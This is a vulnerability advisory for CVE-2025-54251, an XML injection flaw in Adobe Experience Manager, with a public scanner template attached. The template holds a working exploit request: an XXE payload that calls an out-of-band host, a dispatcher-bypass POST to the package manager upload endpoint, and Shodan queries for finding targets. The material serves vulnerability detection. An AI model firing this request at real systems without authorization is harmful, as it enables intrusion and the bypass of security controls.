CVE-2025-54251: Adobe Experience Manager ≤ 6.5.23.0 - XML Injection

Date: 2025-08-01 | Affected software: Adobe Experience Manager | PoC: public

Vulnerability description

Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.

PoC code [public]

id: CVE-2025-54251

info:
  name: Adobe Experience Manager ≤ 6.5.23.0 - XML Injection
  author: DhiyaneshDK,assetnote
  severity: medium
  description: |
    Adobe Experience Manager versions 6.5.23.0 and earlier are affected by an XML Injection vulnerability that could result in a Security feature bypass.
  reference:
    - https://github.com/assetnote/hopgoblin/blob/main/hopgoblin.py
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54251
    - https://helpx.adobe.com/security/products/experience-manager/apsb25-90.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2025-54251
    epss-score: 0.1714
    epss-percentile: 0.94726
    cwe-id: CWE-91
    cpe: cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query:
      - http.title:"aem sign in"
      - http.component:"adobe experience manager"
      - cpe:"cpe:2.3:a:adobe:experience_manager"
  tags: cve,2025,adobe,aem,xxe,oast,oob,intrusive,vuln,vkev

variables:
  marker: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
  boundary: "{{hex_encode(rand_text_alphanumeric(32))}}"
  xxe_payload: '<!DOCTYPE x [<!ENTITY foo SYSTEM "http://{{interactsh-url}}/{{marker}}">]><x>&foo;</x>'

http:
  - raw:
      - |
        POST /crx/packmgr/service/exec.json;x='x/graphql/execute/json/x'?cmd=upload&jsonInTextarea=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: hopgoblin/1.0
        Content-Type: multipart/form-data; boundary={{boundary}}

        --{{boundary}}
        Content-Disposition: form-data; name="package"; filename="{{filename}}.zip"
        Content-Type: application/zip

        {{zip('META-INF/vault/privileges.xml',xxe_payload)}}
        --{{boundary}}--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body,'success')"
          - "contains(interactsh_protocol, 'http')"
        condition: and
# digest: 490a004630440220374723281f78910fc48394b49fea40cc3f3a7786fd3d50fa4643a5684dd7dd0902203c342fec561e6c5c8b0fe3e05e8f8fbbc3367c6f235e34f35c2fcefbd468a957:922c64590222798bb761d5b6d8e72950